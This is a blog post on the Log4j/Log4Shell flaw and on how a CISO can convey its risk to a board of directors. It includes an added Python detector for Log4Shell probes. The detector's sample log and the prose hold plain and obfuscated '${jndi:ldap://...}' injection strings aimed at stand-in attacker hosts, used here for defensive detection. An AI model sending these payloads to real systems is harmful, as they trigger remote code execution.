So far this year, the Cybersecurity front seems to be about the same as it was last year. Of course, anything can happen right now, given that a Russian attack on Ukraine seems to be more or less imminent.
Because of this, our own Federal Government has been putting out alerts warning of a sharp escalation in the number of Cyberattacks that could originate from that region. Fingers crossed that nothing happens.
Trying not to get political here, but what the world needs right now is peace, given what the Omicron variant has already done to the world. But last month, lots of attention and news headlines were spent on another major hack, one whose ramifications are probably far worse than those of the SolarWinds attack. What is this hack, you may be asking?
Well, it is Log4j. Now, I don’t know all of the details about this
one, and I know it sounds bad on my part, but truthfully, I have not really
kept up to speed with what has been happening on this front.
Essentially, Log4j is a logging library for Java applications: developers build it into their software, and the logs it writes are read by network administrators and end users alike. Here is a good technical definition of it:
“Log4j records events – errors and routine system operations
– and communicates diagnostic messages about them to system administrators and
users. It’s open-source software provided by the Apache Software
Foundation.”
It is Open-Source, and while the intent of it is to provide a tool for keeping track of what an application is doing (including suspicious behavior), the flaw disclosed in December 2021, known as Log4Shell (CVE-2021-44228), turned the logging itself into the way in. Vulnerable versions of Log4j evaluate lookup expressions embedded in the text they log, so a Cyberattacker who can get a string such as `${jndi:ldap://attacker-server/...}` written to a log (a web request header is enough) can make the server reach out to a machine the attacker controls and run code from it. Because Log4j is embedded in an enormous number of commercial products and in-house applications, the attacker can deploy malicious payloads against many targets at once, and, much as with the SolarWinds hack, one shared component put a great many organizations at risk simultaneously. The practical problem for most companies was not patching Log4j itself but finding every product and internal application that quietly bundled it.
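To make "hit by Log4j" concrete for the people who have to explain it, here is a small added example (my own code, not something from the original post, and not code from the Apache Log4j project): a Python scanner that reads web server access log lines and flags requests carrying a Log4Shell probe. The flaw (CVE-2021-44228) is that vulnerable Log4j versions evaluate `${...}` lookup expressions in logged text, so an attacker places `${jndi:ldap://their-server/...}` in a header or URL and waits for the server to log it. Attackers quickly started hiding that string with nested lookups such as `${${lower:j}ndi:...}` and with URL encoding, so the scanner first undoes the encoding and resolves the common lookup tricks, then checks for the literal `${jndi:`. The log lines, hostnames and IP addresses below are constructed for the example.

```python
"""Scan web access logs for Log4Shell (CVE-2021-44228) probe strings.

Added example for this post, not code from the original article or from the
Apache Log4j project. The log lines below are constructed, and the
de-obfuscation rules cover the lookup tricks attackers commonly used
(${lower:..}, ${upper:..}, ${...:-default}) to hide the literal ${jndi:
from naive string matching.
"""
import re
from urllib.parse import unquote

# An innermost lookup: ${...} whose body contains no nested ${ or }.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# The string we are really looking for; Log4j lookup names are case-insensitive.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Apache/Nginx "combined" log format.
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def _resolve(match):
    """Evaluate one innermost lookup the way the obfuscation relies on."""
    body = match.group(1)
    key, _, rest = body.partition(":")
    key = key.lower()
    if key == "jndi":
        return match.group(0)          # keep the lookup we want to detect
    if key == "lower":
        return rest.lower()            # ${lower:J} -> j
    if key == "upper":
        return rest.upper()            # ${upper:j} -> J
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${env:NaN:-j} and ${::-j} both -> j
    return match.group(0)              # unknown lookup (e.g. ${sys:..}): leave as-is


def normalize(text, max_rounds=10):
    """Undo URL encoding (twice, for double-encoded probes) and nested lookups."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(text):
    """True if the text, once de-obfuscated, carries a ${jndi:...} lookup."""
    return _JNDI.search(normalize(text)) is not None


def scan_log(log_text):
    """Return (source_ip, field) for each line whose request, referer or
    user-agent carries a probe. Malformed lines are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = _COMBINED.match(line)
        if not m:
            continue
        for field in ("request", "referer", "agent"):
            if is_log4shell_probe(m.group(field)):
                hits.append((m.group("ip"), field))
                break
    return hits


# Constructed sample: one clean request, three probes (plain, URL-encoded in the
# query string, and a heavily obfuscated one in the Referer), and one
# false-positive candidate that uses a harmless ${sys:...} lookup.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:21:03:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Dec/2021:21:04:02 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.23:1389/a}"
198.51.100.23 - - [10/Dec/2021:21:04:05 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.79"
198.51.100.23 - - [10/Dec/2021:21:04:09 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.example/a}" "Mozilla/5.0"
192.0.2.9 - - [10/Dec/2021:21:05:00 +0000] "GET /docs/${sys:java.version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, field in scan_log(SAMPLE_LOG):
        print(f"Log4Shell probe from {ip} in the {field} field")
```

Two caveats a practitioner would add: a hit in the access log only shows that someone tried, not that the application was vulnerable or that the callback to the attacker's LDAP or RMI server succeeded, so the next step is to check outbound connections from the server around that timestamp; and a clean scan proves nothing if the vulnerable application logs input that never reaches the web server log (message queues, internal APIs, usernames on a login form).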
I will write another blog in the future that will cover more
about the technical nature of this hack, but the main purpose of this one today
is the lack of communication that took place in Corporate America when it came
to notifying all of the impacted stakeholders.
This is especially true for the Board of Directors of any
company.
Many of the people who occupy this high perch still have no idea of just how truly devastating a Cyberattack can be. In fact, according to a recent survey from Gartner, 88% of boards in Corporate America still view Cybersecurity just as a business risk. They still do not take the holistic approach of treating it as a technological risk as well, one which can have dire consequences for the entire company they are charged with leading.
More information about this study can be found on the link
below:
In fact, the Log4j hack had such a far-reaching impact that even the Cybersecurity and Infrastructure Security Agency (CISA) issued various bulletins on how to mitigate the risk and damage it posed.
Heck, even the FTC recently announced that it would take legal action against companies that fail to take reasonable steps to protect the PII datasets of employees and customers that could be exposed through it.
These messages were also aimed at the Boards of Directors of Corporate America, pointing out directly that they could be found negligent, and held liable, if they do not take further steps to be more proactive about Cybersecurity.
But unfortunately, explaining all of this to a Board of Directors falls squarely on the shoulders of the CISO. And if they cannot do it succinctly, then of course their jobs are in limbo.
So what can a CISO do to convey the damage potential a hack like Log4j has for their company?
Here are some tips:
1)
Explain the entire picture:
In order for your Board of Directors to get the complete picture of what is going on, you have to explain it in terms they can understand. For example, mention the big-name IT vendors that were also affected by this: Amazon Web Services, Oracle, Cisco, IBM, Fortinet, VMware, Microsoft, etc. Hammer home the point that even though these companies probably have some of the best lines of defense possible, they too were exposed. The idea is to point out that anybody can be a victim, including your own company. So what is the point of waiting until you are impacted to become proactive? Stress the importance of doing this now.
2)
Break things down into dollars and cents:
Unfortunately, boards in Corporate America understand one thing above all: the bottom line. So, as the CISO, work closely with the financial analysts in your company to break down the dollar-and-cent cost borne by a company that was actually impacted (assuming you can get those numbers from somewhere), and from there extrapolate what the potential financial loss to your own company could be. This should get some ears perked up.
3)
Illustrate who will be impacted:
In a large-scale attack such as this one, it is not just you, your employees and your customers who are impacted. Keep in mind that your external third parties, such as suppliers, will bear the brunt of the damage as well, because they make use of the PII datasets you have provided to them. Also tell your board that if those third parties are impacted, it is not they who will be held legally responsible; it is your company, as the owner of that data. Explain what this will mean in terms of brand loss and reputational damage.
4)
The need for manpower:
Just about every IT Security team imaginable is stretched well beyond its breaking point. There are simply not enough people around to help detect and thwart the looming threat variants out there. Explain to your board that you need more people, and that you desperately need the funding for them. Tell them that you do not have to make direct hires (which would of course bring more cost to the company); hiring contractors will work just as well (after they have been properly vetted, of course). Heck, even tell them you can hire college graduates with little experience. This will also help close the huge employment gap the Cyber industry faces today.
My Thoughts On This:
In the end, in a large business setting, everything comes from the top, and that is how all employees, all the way down to the overnight cleaning crew, will act. Don’t blame the CISO for anything and everything. In the end, the buck stops with the Board of Directors, and the people who occupy those seats need to act as such.
The era of board members who think they have God-like powers has to end here and now.
In the end, your Board of Directors are normal human beings, just like you and me. They have no special or magical powers, except maybe for the ego trip they get from being at the top.
But this all has to be put aside, and your Board of Directors must
understand that they have a huge stake in the Cybersecurity of your company as
well.
Once the ego checks have been put in place and the finger pointing has stopped, only then can Corporate America truly be on the path to instilling a proactive mindset that flows all the way down to the employees.